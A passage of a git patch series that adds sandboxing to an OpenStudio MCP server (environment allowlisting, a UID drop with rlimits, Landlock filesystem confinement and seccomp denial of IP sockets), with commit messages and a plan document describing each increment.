+    "OS_BUNDLER_VERSION", "RC_RELEASE",
+    "VENV_PATH", "PYTHONUNBUFFERED",
+    "COMSTOCK_MEASURES_DIR", "COMMON_MEASURES_DIR", "SKILLS_DIR",
+    "OSCLI_GEMFILE", "OSCLI_GEM_PATH",
+    "OSMCP_RUN_ROOT", "OPENSTUDIO_MCP_RUN_ROOT",
+})
+_ENV_ALLOW_PREFIXES = ("BUNDLE_", "GEM_", "LC_")
+
+
+def enabled() -> bool:
+    """True when any confinement is active (i.e. OSMCP_SANDBOX is not 'off')."""
+    return SANDBOX_MODE not in ("", "off", "0", "false", "no")
+
+
+def active_tier() -> str:
+    """The confinement tier actually in effect — surfaced in tool output."""
+    if not enabled():
+        return "off"
+    return "posix"  # later increments: "landlock" / "bwrap"
+
+
+def build_env(work_dir: Path | str) -> dict[str, str]:
+    """Environment for a confined subprocess.
+
+    Disabled → full passthrough (``os.environ.copy()``), preserving today's
+    behaviour. Enabled → only allowlisted variables survive and HOME/TMPDIR are
+    pinned into the work dir, so no host secret reaches measure code and caches
+    stay inside the run directory (which the FS backend will later confine).
+    """
+    if not enabled():
+        return os.environ.copy()
+    work = Path(work_dir)
+    env = {
+        k: v for k, v in os.environ.items()
+        if k in _ENV_ALLOW_EXACT or k.startswith(_ENV_ALLOW_PREFIXES)
+    }
+    env["HOME"] = str(work)
+    tmp = work / "tmp"
+    try:
+        tmp.mkdir(parents=True, exist_ok=True)
+        env["TMPDIR"] = str(tmp)
+    except OSError:
+        pass
+    return env
+
+
+def wrap_cmd(cmd: list[str]) -> list[str]:
+    """Wrap a subprocess argv to run under the privilege-dropping exec shim.
+
+    Disabled → returns the command unchanged (today's behaviour). Enabled → runs
+    it via `python3 -m mcp_server._sandbox_exec`, which drops to the unprivileged
+    sandbox uid, applies rlimits, sets no_new_privs, then execs the command (so
+    the pid is preserved and the dispatcher's kill-by-pid path still works).
+    """
+    if not enabled():
+        return list(cmd)
+    wrapped = [
+        sys.executable, "-m", "mcp_server._sandbox_exec",
+        "--uid", str(SANDBOX_UID), "--gid", str(SANDBOX_GID),
+    ]
+    for flag, value in (
+        ("--rlimit-fsize", SANDBOX_RLIMIT_FSIZE),
+        ("--rlimit-nproc", SANDBOX_RLIMIT_NPROC),
+        ("--rlimit-nofile", SANDBOX_RLIMIT_NOFILE),
+        ("--rlimit-cpu", SANDBOX_RLIMIT_CPU),
+        ("--rlimit-as", SANDBOX_RLIMIT_AS),
+    ):
+        if value and value > 0:
+            wrapped += [flag, str(value)]
+    return [*wrapped, "--", *cmd]
+
+
+def prepare_workdir(work_dir: Path | str) -> None:
+    """Hand the work dir to the sandbox account so the dropped process can write.
+
+    No-op when confinement is off. The server is root, so it chowns the run dir
+    (recursively) to the sandbox uid before exec; the root server still reads the
+    outputs afterwards. Bind mounts that ignore ownership (e.g. Docker Desktop)
+    make this a harmless no-op there — confinement still holds for in-image paths.
+    """
+    if not enabled():
+        return
+    work = Path(work_dir)
+    with contextlib.suppress(OSError):
+        os.chown(work, SANDBOX_UID, SANDBOX_GID)
+    for path in work.rglob("*"):
+        with contextlib.suppress(OSError):
+            os.chown(path, SANDBOX_UID, SANDBOX_GID)
diff --git a/mcp_server/skills/measure_authoring/operations.py b/mcp_server/skills/measure_authoring/operations.py
index 5ef1ed9..8b415bc 100644
--- a/mcp_server/skills/measure_authoring/operations.py
+++ b/mcp_server/skills/measure_authoring/operations.py
@@ -13,6 +13,7 @@
 
 import openstudio
 
+from mcp_server import sandbox
 from mcp_server.config import INPUT_ROOT, user_run_root
 
 
@@ -1016,6 +1017,7 @@ def test_measure_op(
             proc = subprocess.run(
                 ["python3", "-m", "pytest", "tests/", "-v", "--tb=short"],
                 cwd=str(mdir),
+                env=sandbox.build_env(mdir),
                 capture_output=True, text=True, timeout=60, check=False,
             )
         else:
@@ -1026,6 +1028,7 @@ def test_measure_op(
             proc = subprocess.run(
                 ["ruby", "-I", ".", str(test_files[0])],
                 cwd=str(mdir),
+                env=sandbox.build_env(mdir),
                 capture_output=True, text=True, timeout=60, check=False,
             )
 
diff --git a/mcp_server/skills/measures/operations.py b/mcp_server/skills/measures/operations.py
index 8cca748..da641dc 100644
--- a/mcp_server/skills/measures/operations.py
+++ b/mcp_server/skills/measures/operations.py
@@ -16,7 +16,13 @@
 
 import openstudio
 
-from mcp_server.config import OSCLI_GEM_PATH, OSCLI_GEMFILE, user_run_root
+from mcp_server import sandbox
+from mcp_server.config import (
+    OSCLI_GEM_PATH,
+    OSCLI_GEMFILE,
+    is_path_allowed,
+    user_run_root,
+)
 from mcp_server.model_manager import get_model, load_model
 from mcp_server.util import resolve_run_dir
 
@@ -141,6 +147,11 @@ def apply_measure(
         measure_path = Path(measure_dir)
         if not measure_path.is_dir():
             return {"ok": False, "error": f"Measure directory not found: {measure_dir}"}
+        # Access control: only run measures from allowed roots (own run area or a
+        # shared read root — repo, inputs, bundled measures). Refuses arbitrary
+        # filesystem paths / another user's area before any copy or execution.
+        if not is_path_allowed(measure_path):
+            return {"ok": False, "error": f"Measure directory not allowed: {measure_dir}"}
 
         # Check measure script exists (Ruby or Python)
         has_rb = (measure_path / "measure.rb").is_file()
@@ -247,13 +258,18 @@ def apply_measure(
                     "--bundle_without", "native_ext"]
         cmd += ["run", run_flag, "-w", str(osw_path)]
         log_path = run_dir / "openstudio.log"
+        # Build env first (it creates run_dir/tmp for TMPDIR as root), THEN hand
+        # the whole run dir — tmp included — to the sandbox uid, so the dropped
+        # process can write its temp/output. Order matters.
+        run_env = sandbox.build_env(run_dir)
+        sandbox.prepare_workdir(run_dir)
         with open(log_path, "w", encoding="utf-8") as log_f:
             proc = subprocess.run(
-                cmd,
+                sandbox.wrap_cmd(cmd),
                 cwd=str(run_dir),
                 stdout=log_f,
                 stderr=subprocess.STDOUT,
-                env=os.environ.copy(),
+                env=run_env,
                 timeout=300,  # 5 minute timeout
                 check=False,
             )
diff --git a/mcp_server/skills/simulation/operations.py b/mcp_server/skills/simulation/operations.py
index 4ec5114..2145eed 100644
--- a/mcp_server/skills/simulation/operations.py
+++ b/mcp_server/skills/simulation/operations.py
@@ -3,7 +3,6 @@
 
 import contextlib
 import json
-import os
 import shutil
 import subprocess
 import tempfile
@@ -17,6 +16,7 @@
 
 import psutil
 
+from mcp_server import sandbox
 from mcp_server.audit import audit
 from mcp_server.config import (
     LOG_TAIL_DEFAULT,
@@ -265,12 +265,16 @@ def _build_run_cmd(osw_path: Path) -> list[str]:
 def _launch(rec: RunRecord) -> None:
     """Start the EnergyPlus subprocess for a queued run. Caller holds _sim_lock."""
     log = rec.run_dir / "openstudio.log"
+    # build_env creates run_dir/tmp (TMPDIR) as root; chown after so the dropped
+    # process owns it (order matters — see apply_measure).
+    run_env = sandbox.build_env(rec.run_dir)
+    sandbox.prepare_workdir(rec.run_dir)
     proc = subprocess.Popen(  # noqa: S603 - cmd built from trusted config + staged OSW path
-        _build_run_cmd(rec.osw_path),
+        sandbox.wrap_cmd(_build_run_cmd(rec.osw_path)),
         cwd=str(rec.run_dir),
         stdout=log.open("w", encoding="utf-8"),
         stderr=subprocess.STDOUT,
-        env=os.environ.copy(),
+        env=run_env,
     )
     rec.pid = proc.pid
     rec.status = "running"

From ceafc91fb6217eba47f7229d32bdde37bdfbbff3 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 12:53:01 -0400
Subject: [PATCH 02/26] feat(security): Landlock FS + seccomp net-deny (sandbox
 increment 3)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Full tier (OSMCP_SANDBOX=auto) closes the last two holes, on top of the POSIX
floor, all via owned ctypes shims (no dependency, pure Python):
- _landlock.py: read-deny-by-default FS policy — ro system roots, rw only the
  run dir (+ /dev for null/urandom). Blocks read-escape (even world-readable
  files) and write-escape, mount-independent.
- _seccomp.py: raw single-arch cBPF denying socket(AF_INET/AF_INET6) with
  EAFNOSUPPORT (AF_UNIX/local IPC unaffected). Blocks outbound IP exfil.
Applied in _sandbox_exec after no_new_privs, degrade-loudly; active_tier reports
"landlock". Chose raw BPF over pyseccomp (broken wheel import).

Verified under auto: read/write escape + net exfil blocked, apply + real
EnergyPlus sim still succeed; comstock/common + weather suites green.
Default stays off; flipping to auto (after a full-suite run under auto) is next.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 docs/plans/measure-exec-sandbox.md         |  45 ++++++---
 mcp_server/_landlock.py                    | 103 +++++++++++++++++++++
 mcp_server/_sandbox_exec.py                |  17 ++++
 mcp_server/_seccomp.py                     |  92 ++++++++++++++++++
 mcp_server/sandbox.py                      |  40 +++++++-
 mcp_server/skills/measures/operations.py   |   2 +-
 mcp_server/skills/simulation/operations.py |   2 +-
 7 files changed, 283 insertions(+), 18 deletions(-)
 create mode 100644 mcp_server/_landlock.py
 create mode 100644 mcp_server/_seccomp.py

diff --git a/docs/plans/measure-exec-sandbox.md b/docs/plans/measure-exec-sandbox.md
index a467936..409accf 100644
--- a/docs/plans/measure-exec-sandbox.md
+++ b/docs/plans/measure-exec-sandbox.md
@@ -149,27 +149,44 @@ primary control: tools stay on by default because their execution is confined.
    **Still pending in this bucket:** wire the sim-timeout *enforcement* into the
    dispatcher (config constant exists; `_launch`/dispatch loop must kill runs
    past the cap via the existing SIGTERM→SIGKILL path).
-2. POSIX floor: setuid `sandbox` user + rlimits via `setpriv` wrapper — small/med
-   (needs Docker rebuild: `useradd sandbox`). Closes runs-as-root + rlimits.
-3. Landlock ctypes module + seccomp net-deny + probe + tier reporting — medium.
-   Closes filesystem escape + network exfil.
-4. bwrap backend + userns probe + operator docs — medium
+2. POSIX floor: UID drop + rlimits — **DONE (increment 2):** `sandbox` user baked
+   into the image (`useradd -u 1001`); `mcp_server/_sandbox_exec.py` shim drops
+   root→1001, applies rlimits (FSIZE 10G / NPROC 1024 on; CPU/AS off), sets
+   no_new_privs, execs (pid preserved); `wrap_cmd`/`prepare_workdir` in
+   `sandbox.py`. Verified: measure runs as uid 1001, NPROC rlimit applied, DAC
+   blocks root-owned write; real EnergyPlus sim runs fine under `posix`.
+3. Landlock FS + seccomp net-deny — **DONE (increment 3):** own ctypes modules
+   `_landlock.py` (read-deny-by-default; ro system roots, rw only the run dir +
+   /dev) and `_seccomp.py` (raw single-arch cBPF: deny `socket(AF_INET/INET6)`,
+   EAFNOSUPPORT). Applied in the shim after no_new_privs, degrade-loudly. Pure
+   Python — no rebuild; chose raw BPF over pyseccomp (its wheel imports broken
+   here). `OSMCP_SANDBOX=auto` = full tier; `active_tier()` reports `landlock`.
+   Verified: read-escape (world-readable /opt file), write-escape, and network
+   exfil all blocked while apply + real sim still succeed; comstock/common
+   measures + weather (39 tests) green under `auto`.
+4. bwrap backend + userns probe + operator docs — medium (optional upgrade)
 5. Elicitation gate — defer
-6. Flip default `OSMCP_SANDBOX` off → `auto` once the full suite passes confined.
+6. Flip default `OSMCP_SANDBOX` off → `auto` — **next.** Gate: run the FULL
+   integration suite (all shards) under `auto` first to surface any remaining
+   Landlock allowlist gaps; add missing ro paths (no rebuild); then flip the
+   default (or set `OSMCP_SANDBOX=auto` in the deployment/Dockerfile ENV).
+   Still pending from bucket 1: wire sim-timeout *enforcement* into the dispatcher.
 
 ## Testing strategy
 
 Goal: tests that (a) **prove the holes exist today** without touching anything
 real, and (b) **prove each is closed** after the fix. Both halves run in CI.
 
-**Status (confirm-now half landed):** `tests/test_sandbox.py` — 3 integration
-tests, CI shard 2, all passing in ~11s. Confirms today (OSMCP_SANDBOX=off):
-measures run as root (uid 0), the server's env secret leaks in, reads/writes
-escape the run dir, network exfil to a localhost canary succeeds, and
-`apply_measure` accepts a `measure_dir` outside all allowed roots. Probes are
-generated at runtime via `create_measure` (Ruby + Python) so the real
-create→apply path is exercised. The `OSMCP_SANDBOX=auto` "blocked" counterparts
-are added with the fix.
+**Status:** `tests/test_sandbox.py` — 9 integration tests, all passing (~34s).
+Kept LOCAL / git-excluded (working exploit PoC), run via the standalone
+`.github/workflows/security.yml`, NOT the main `ci` shards. Probes are generated
+at runtime via `create_measure` (Ruby + Python) so the real create→apply path is
+exercised. Coverage:
+- off: all five holes confirmed (root, env leak, read/write escape, net exfil)
+- posix: uid 1001, NPROC rlimit, DAC blocks root-owned write, env stripped
+- auto (Landlock + seccomp): read-escape + write-escape + net exfil blocked,
+  run still succeeds
+- unconditional: `measure_dir` traversal rejected
 
 ### Core principle — dual-run falsifiability
 
diff --git a/mcp_server/_landlock.py b/mcp_server/_landlock.py
new file mode 100644
index 0000000..c143109
--- /dev/null
+++ b/mcp_server/_landlock.py
@@ -0,0 +1,103 @@
+"""Minimal Landlock (LSM) filesystem confinement via raw syscalls (ctypes).
+
+Three syscalls, no external dependency (house style: grepable, owned). Applies a
+read-deny-by-default policy to the current process and all its children: only the
+enumerated read-only paths are readable/executable, and only the run dir is
+writable. Requires no_new_privs (set by the caller) for unprivileged use; works
+inside default-seccomp Docker >= 23.0 (the landlock_* syscalls are allowlisted
+there). Returns the applied ABI, or 0 when Landlock is unavailable — the caller
+degrades loudly rather than failing the run.
+"""
+from __future__ import annotations
+
+import ctypes
+import os
+
+# Generic syscall table numbers (identical on x86_64 and aarch64).
+_NR_CREATE_RULESET = 444
+_NR_ADD_RULE = 445
+_NR_RESTRICT_SELF = 446
+
+_CREATE_RULESET_VERSION = 1  # query the ABI instead of creating a ruleset
+_RULE_PATH_BENEATH = 1
+
+# access_fs rights (bit positions). 0..12 = ABI 1, REFER = ABI 2, TRUNCATE = ABI 3.
+_A_EXECUTE = 1 << 0
+_A_WRITE_FILE = 1 << 1
+_A_READ_FILE = 1 << 2
+_A_READ_DIR = 1 << 3
+_A_REMOVE_DIR = 1 << 4
+_A_REMOVE_FILE = 1 << 5
+_A_MAKE_CHAR = 1 << 6
+_A_MAKE_DIR = 1 << 7
+_A_MAKE_REG = 1 << 8
+_A_MAKE_SOCK = 1 << 9
+_A_MAKE_FIFO = 1 << 10
+_A_MAKE_BLOCK = 1 << 11
+_A_MAKE_SYM = 1 << 12
+_A_REFER = 1 << 13      # ABI >= 2
+_A_TRUNCATE = 1 << 14   # ABI >= 3
+
+_RO = _A_EXECUTE | _A_READ_FILE | _A_READ_DIR
+_RW_BASE = (
+    _A_EXECUTE | _A_WRITE_FILE | _A_READ_FILE | _A_READ_DIR
+    | _A_REMOVE_DIR | _A_REMOVE_FILE | _A_MAKE_CHAR | _A_MAKE_DIR | _A_MAKE_REG
+    | _A_MAKE_SOCK | _A_MAKE_FIFO | _A_MAKE_BLOCK | _A_MAKE_SYM
+)
+
+
+class _RulesetAttr(ctypes.Structure):
+    # Only handled_access_fs — 8 bytes, valid on every ABID (kernel reads the
+    # field set implied by `size`); avoids the ABI>=4 net field tripping abi3.
+    _fields_ = [("handled_access_fs", ctypes.c_uint64)]
+
+
+class _PathBeneathAttr(ctypes.Structure):
+    _pack_ = 1
+    _fields_ = [("allowed_access", ctypes.c_uint64), ("parent_fd", ctypes.c_int32)]
+
+
+def restrict(ro_paths: list[str], rw_paths: list[str]) -> int:
+    """Confine the filesystem to ro_paths (read+exec) and rw_paths (read+write).
+
+    Returns the applied Landlock ABI (>=1), or 0 if Landlock is unavailable or
+    the ruleset could not be enforced. Missing paths are skipped silently.
+    """
+    libc = ctypes.CDLL("libc.so.6", use_errno=True)
+
+    abi = libc.syscall(_NR_CREATE_RULESET, None, 0, _CREATE_RULESET_VERSION)
+    if abi <= 0:
+        return 0
+
+    handled = _RW_BASE
+    if abi >= 2:
+        handled |= _A_REFER
+    if abi >= 3:
+        handled |= _A_TRUNCATE
+
+    attr = _RulesetAttr(handled_access_fs=handled)
+    rs_fd = libc.syscall(_NR_CREATE_RULESET, ctypes.byref(attr), ctypes.sizeof(attr), 0)
+    if rs_fd < 0:
+        return 0
+
+    def _add(path: str, access: int) -> None:
+        try:
+            fd = os.open(path, os.O_PATH | os.O_CLOEXEC)
+        except OSError:
+            return  # path absent — skip
+        try:
+            pba = _PathBeneathAttr(allowed_access=access & handled, parent_fd=fd)
+            libc.syscall(_NR_ADD_RULE, rs_fd, _RULE_PATH_BENEATH, ctypes.byref(pba), 0)
+        finally:
+            os.close(fd)
+
+    for p in ro_paths:
+        _add(p, _RO)
+    for p in rw_paths:
+        _add(p, handled)  # full set for the writable run dir
+
+    # no_new_privs is set by the caller; restrict_self enforces the ruleset on
+    # this process and everything it execs/forks.
+    rc = libc.syscall(_NR_RESTRICT_SELF, rs_fd, 0)
+    os.close(rs_fd)
+    return abi if rc == 0 else 0
diff --git a/mcp_server/_sandbox_exec.py b/mcp_server/_sandbox_exec.py
index fa5ae1e..ee23b24 100644
--- a/mcp_server/_sandbox_exec.py
+++ b/mcp_server/_sandbox_exec.py
@@ -58,6 +58,9 @@ def main(argv: list[str]) -> int:
     ap.add_argument("--gid", type=int, required=True)
     for name in _RLIMITS:
         ap.add_argument(f"--rlimit-{name}", type=int, default=0)
+    ap.add_argument("--landlock-ro", action="append", default=[])
+    ap.add_argument("--landlock-rw", action="append", default=[])
+    ap.add_argument("--seccomp-net", action="store_true")
     ns = ap.parse_args(argv[:sep])
 
     # rlimits first, while still privileged (lowering hard limits is always ok).
@@ -71,6 +74,20 @@ def main(argv: list[str]) -> int:
 
     _set_no_new_privs()
 
+    # Filesystem + network confinement (after no_new_privs, before the uid drop;
+    # both persist across setuid + exec and are inherited by children). Degrade
+    # loudly — a backend that cannot engage prints a notice and the run proceeds
+    # with whatever confinement did apply (the POSIX floor always holds).
+    if ns.landlock_ro or ns.landlock_rw:
+        from mcp_server import _landlock
+        abi = _landlock.restrict(ns.landlock_ro, ns.landlock_rw)
+        if not abi:
+            print("sandbox-exec: WARNING Landlock unavailable — FS not confined", file=sys.stderr)
+    if ns.seccomp_net:
+        from mcp_server import _seccomp
+        if not _seccomp.install_net_deny():
+            print("sandbox-exec: WARNING seccomp net-deny unavailable — network not confined", file=sys.stderr)
+
     # Drop privileges: supplementary groups, then gid, then uid (order matters —
     # setgroups/setgid require privilege we lose after setuid).
     os.setgroups([ns.gid])
diff --git a/mcp_server/_seccomp.py b/mcp_server/_seccomp.py
new file mode 100644
index 0000000..cdf809b
--- /dev/null
+++ b/mcp_server/_seccomp.py
@@ -0,0 +1,92 @@
+"""Minimal seccomp-BPF network deny via raw syscalls (ctypes), no dependency.
+
+Installs a classic-BPF seccomp filter that fails ``socket(AF_INET|AF_INET6, ...)``
+with EAFNOSUPPORT and leaves AF_UNIX (and every other syscall) untouched —
+blocking outbound IP networking from measure code while local IPC / the bundler
+still work. The program is built for the running arch (the shim executes on the
+workload's arch), so there is no cross-arch branching to get wrong; an unexpected
+arch makes install a no-op. Requires no_new_privs (set by the caller).
+
+Returns True if the filter was installed, False if unavailable — the caller
+degrades loudly rather than failing the run.
+"""
+from __future__ import annotations
+
+import ctypes
+import errno
+import platform
+import struct
+
+# BPF opcodes
+_BPF_LD_W_ABS = 0x00 | 0x00 | 0x20   # BPF_LD | BPF_W | BPF_ABS
+_BPF_JEQ_K = 0x05 | 0x10 | 0x00      # BPF_JMP | BPF_JEQ | BPF_K
+_BPF_RET_K = 0x06 | 0x00             # BPF_RET | BPF_K
+
+# seccomp return actions
+_SECCOMP_RET_ALLOW = 0x7FFF0000
+_SECCOMP_RET_ERRNO = 0x00050000
+
+# seccomp_data field offsets (nr@0, arch@4, ip@8, args[0]@16 ...; little-endian)
+_OFF_NR = 0
+_OFF_ARCH = 4
+_OFF_ARG0 = 16
+
+# AUDIT_ARCH + __NR_socket per arch
+_AUDIT_ARCH = {"x86_64": 0xC000003E, "aarch64": 0xC00000B7}
+_NR_SOCKET = {"x86_64": 41, "aarch64": 198}
+
+_AF_INET = 2
+_AF_INET6 = 10
+
+_PR_SET_SECCOMP = 22
+_SECCOMP_MODE_FILTER = 2
+
+
+def _stmt(code: int, k: int) -> bytes:
+    return struct.pack("=HBBI", code, 0, 0, k)
+
+
+def _jump(code: int, k: int, jt: int, jf: int) -> bytes:
+    return struct.pack("=HBBI", code, jt, jf, k)
+
+
+class _SockFprog(ctypes.Structure):
+    _fields_ = [("len", ctypes.c_ushort), ("filter", ctypes.c_void_p)]
+
+
+def install_net_deny() -> bool:
+    mach = platform.machine()
+    if mach not in _AUDIT_ARCH:
+        return False
+    audit_arch = _AUDIT_ARCH[mach]
+    nr_socket = _NR_SOCKET[mach]
+    deny = _SECCOMP_RET_ERRNO | (errno.EAFNOSUPPORT & 0xFFFF)
+
+    # Instruction layout (jt/jf are offsets from the NEXT instruction):
+    #   0 load arch
+    #   1 arch == ours ? -> 2 : ALLOW(8)
+    #   2 load nr
+    #   3 nr == socket ? -> 4 : ALLOW(8)
+    #   4 load args[0] (domain)
+    #   5 domain == AF_INET  ? DENY(7) : 6
+    #   6 domain == AF_INET6 ? DENY(7) : ALLOW(8)
+    #   7 RET deny
+    #   8 RET allow
+    program = b"".join([
+        _stmt(_BPF_LD_W_ABS, _OFF_ARCH),
+        _jump(_BPF_JEQ_K, audit_arch, 0, 6),
+        _stmt(_BPF_LD_W_ABS, _OFF_NR),
+        _jump(_BPF_JEQ_K, nr_socket, 0, 4),
+        _stmt(_BPF_LD_W_ABS, _OFF_ARG0),
+        _jump(_BPF_JEQ_K, _AF_INET, 1, 0),
+        _jump(_BPF_JEQ_K, _AF_INET6, 0, 1),
+        _stmt(_BPF_RET_K, deny),
+        _stmt(_BPF_RET_K, _SECCOMP_RET_ALLOW),
+    ])
+    n = len(program) // 8
+    buf = ctypes.create_string_buffer(program, len(program))
+    fprog = _SockFprog(len=n, filter=ctypes.cast(buf, ctypes.c_void_p))
+
+    libc = ctypes.CDLL("libc.so.6", use_errno=True)
+    rc = libc.prctl(_PR_SET_SECCOMP, _SECCOMP_MODE_FILTER, ctypes.byref(fprog), 0, 0)
+    return rc == 0
diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py
index 119bee6..17ba42e 100644
--- a/mcp_server/sandbox.py
+++ b/mcp_server/sandbox.py
@@ -28,6 +28,9 @@
 from pathlib import Path
 
 from mcp_server.config import (
+    COMMON_MEASURES_DIR,
+    COMSTOCK_MEASURES_DIR,
+    INPUT_ROOT,
     SANDBOX_GID,
     SANDBOX_MODE,
     SANDBOX_RLIMIT_AS,
@@ -36,8 +39,17 @@
     SANDBOX_RLIMIT_NOFILE,
     SANDBOX_RLIMIT_NPROC,
     SANDBOX_UID,
+    SKILLS_DIR,
 )
 
+# Read-only roots the confined subprocess legitimately needs (Landlock grants
+# read+exec here, nothing else; the run dir is the only writable path). Read-deny
+# by default: anything not listed — another user's run, /tmp, arbitrary host
+# files — is unreadable. Missing paths are skipped by the Landlock layer.
+_FULL_MODES = ("auto", "full", "landlock")
+_RO_SYSTEM = ("/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc",
+              "/opt/venv", "/usr/local", "/var/oscli", "/proc", "/sys")
+
 # Environment the OpenStudio CLI / bundler / EnergyPlus / measure code legitimately
 # needs. Everything else — notably any host secret — is dropped in confined modes.
 _ENV_ALLOW_EXACT = frozenset({
@@ -57,11 +69,25 @@ def enabled() -> bool:
     return SANDBOX_MODE not in ("", "off", "0", "false", "no")
 
 
+def _full() -> bool:
+    """True when the full tier (Landlock FS + seccomp net-deny) is requested."""
+    return SANDBOX_MODE in _FULL_MODES
+
+
 def active_tier() -> str:
     """The confinement tier actually in effect — surfaced in tool output."""
     if not enabled():
         return "off"
-    return "posix"  # later increments: "landlock" / "bwrap"
+    return "landlock" if _full() else "posix"
+
+
+def _ro_paths() -> list[str]:
+    """Read-only roots the confined subprocess may read/execute."""
+    return [
+        *_RO_SYSTEM,
+        str(COMSTOCK_MEASURES_DIR), str(COMMON_MEASURES_DIR),
+        str(INPUT_ROOT), str(SKILLS_DIR), "/repo",
+    ]
 
 
 def build_env(work_dir: Path | str) -> dict[str, str]:
@@ -89,13 +115,15 @@ def build_env(work_dir: Path | str) -> dict[str, str]:
     return env
 
 
-def wrap_cmd(cmd: list[str]) -> list[str]:
+def wrap_cmd(cmd: list[str], work_dir: Path | str) -> list[str]:
     """Wrap a subprocess argv to run under the privilege-dropping exec shim.
 
     Disabled → returns the command unchanged (today's behaviour). Enabled → runs
     it via `python3 -m mcp_server._sandbox_exec`, which drops to the unprivileged
     sandbox uid, applies rlimits, sets no_new_privs, then execs the command (so
     the pid is preserved and the dispatcher's kill-by-pid path still works).
+    Full tier additionally confines the filesystem (Landlock: read-only system
+    roots, writable only `work_dir`) and denies outbound IP networking (seccomp).
     """
     if not enabled():
         return list(cmd)
@@ -112,6 +140,14 @@ def wrap_cmd(cmd: list[str]) -> list[str]:
     ):
         if value and value > 0:
             wrapped += [flag, str(value)]
+    if _full():
+        for path in _ro_paths():
+            wrapped += ["--landlock-ro", path]
+        # rw: the run dir, plus /dev for /dev/null & /dev/urandom (node creation
+        # there is still barred by DAC for the unprivileged uid).
+        for path in (str(work_dir), "/dev"):
+            wrapped += ["--landlock-rw", path]
+        wrapped += ["--seccomp-net"]
     return [*wrapped, "--", *cmd]
 
 
diff --git a/mcp_server/skills/measures/operations.py b/mcp_server/skills/measures/operations.py
index da641dc..e4f1e63 100644
--- a/mcp_server/skills/measures/operations.py
+++ b/mcp_server/skills/measures/operations.py
@@ -265,7 +265,7 @@ def apply_measure(
         sandbox.prepare_workdir(run_dir)
         with open(log_path, "w", encoding="utf-8") as log_f:
             proc = subprocess.run(
-                sandbox.wrap_cmd(cmd),
+                sandbox.wrap_cmd(cmd, run_dir),
                 cwd=str(run_dir),
                 stdout=log_f,
                 stderr=subprocess.STDOUT,
diff --git a/mcp_server/skills/simulation/operations.py b/mcp_server/skills/simulation/operations.py
index 2145eed..df8de0e 100644
--- a/mcp_server/skills/simulation/operations.py
+++ b/mcp_server/skills/simulation/operations.py
@@ -270,7 +270,7 @@ def _launch(rec: RunRecord) -> None:
     run_env = sandbox.build_env(rec.run_dir)
     sandbox.prepare_workdir(rec.run_dir)
     proc = subprocess.Popen(  # noqa: S603 - cmd built from trusted config + staged OSW path
-        sandbox.wrap_cmd(_build_run_cmd(rec.osw_path)),
+        sandbox.wrap_cmd(_build_run_cmd(rec.osw_path), rec.run_dir),
         cwd=str(rec.run_dir),
         stdout=log.open("w", encoding="utf-8"),
         stderr=subprocess.STDOUT,

From 1b6a62b2dcec6476cf351196e71929467d9b224c Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 13:23:56 -0400
Subject: [PATCH 03/26] fix(security): keep test_measure temp off the run dir
 (Docker bind mount)

Under clean-env, pass redirect_tmp=False for test_measure's pytest/ruby run so
TMPDIR stays on /tmp. test_measure isn't Landlocked, and pytest's capture uses an
unlinked tempfile that the Docker Desktop bind mount can't keep open when TMPDIR
is run_dir/tmp -> FileNotFoundError on truncate. apply_measure/sim keep
TMPDIR=run_dir/tmp (Landlock needs it; openstudio doesn't use unlinked tempfiles).
Fixes the only 2 failures in the full-suite-under-auto run (719 -> 721 pass).

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/sandbox.py                         | 30 +++++++++++--------
 .../skills/measure_authoring/operations.py    |  4 +--
 2 files changed, 20 insertions(+), 14 deletions(-)

diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py
index 17ba42e..336572d 100644
--- a/mcp_server/sandbox.py
+++ b/mcp_server/sandbox.py
@@ -90,28 +90,34 @@ def _ro_paths() -> list[str]:
     ]
 
 
-def build_env(work_dir: Path | str) -> dict[str, str]:
+def build_env(work_dir: Path | str, *, redirect_tmp: bool = True) -> dict[str, str]:
     """Environment for a confined subprocess.
 
     Disabled → full passthrough (``os.environ.copy()``), preserving today's
-    behaviour. Enabled → only allowlisted variables survive and HOME/TMPDIR are
-    pinned into the work dir, so no host secret reaches measure code and caches
-    stay inside the run directory (which the FS backend will later confine).
+    behaviour. Enabled → only allowlisted variables survive, so no host secret
+    reaches measure code.
+
+    redirect_tmp (default) pins HOME/TMPDIR into work_dir/tmp, keeping temp +
+    caches inside the run dir so the Landlock backend (which makes only that dir
+    writable) permits them. Pass redirect_tmp=False for the non-Landlocked
+    test_measure path: pytest's capture uses an unlinked tempfile, which the
+    Docker-Desktop bind mount can't keep open — so it must stay on /tmp.
     """
     if not enabled():
         return os.environ.copy()
-    work = Path(work_dir)
     env = {
         k: v for k, v in os.environ.items()
         if k in _ENV_ALLOW_EXACT or k.startswith(_ENV_ALLOW_PREFIXES)
     }
-    env["HOME"] = str(work)
-    tmp = work / "tmp"
-    try:
-        tmp.mkdir(parents=True, exist_ok=True)
-        env["TMPDIR"] = str(tmp)
-    except OSError:
-        pass
+    if redirect_tmp:
+        work = Path(work_dir)
+        env["HOME"] = str(work)
+        tmp = work / "tmp"
+        try:
+            tmp.mkdir(parents=True, exist_ok=True)
+            env["TMPDIR"] = str(tmp)
+        except OSError:
+            pass
     return env
 
 
diff --git a/mcp_server/skills/measure_authoring/operations.py b/mcp_server/skills/measure_authoring/operations.py
index 8b415bc..df386b4 100644
--- a/mcp_server/skills/measure_authoring/operations.py
+++ b/mcp_server/skills/measure_authoring/operations.py
@@ -1017,7 +1017,7 @@ def test_measure_op(
             proc = subprocess.run(
                 ["python3", "-m", "pytest", "tests/", "-v", "--tb=short"],
                 cwd=str(mdir),
-                env=sandbox.build_env(mdir),
+                env=sandbox.build_env(mdir, redirect_tmp=False),
                 capture_output=True, text=True, timeout=60, check=False,
             )
         else:
@@ -1028,7 +1028,7 @@ def test_measure_op(
             proc = subprocess.run(
                 ["ruby", "-I", ".", str(test_files[0])],
                 cwd=str(mdir),
-                env=sandbox.build_env(mdir),
+                env=sandbox.build_env(mdir, redirect_tmp=False),
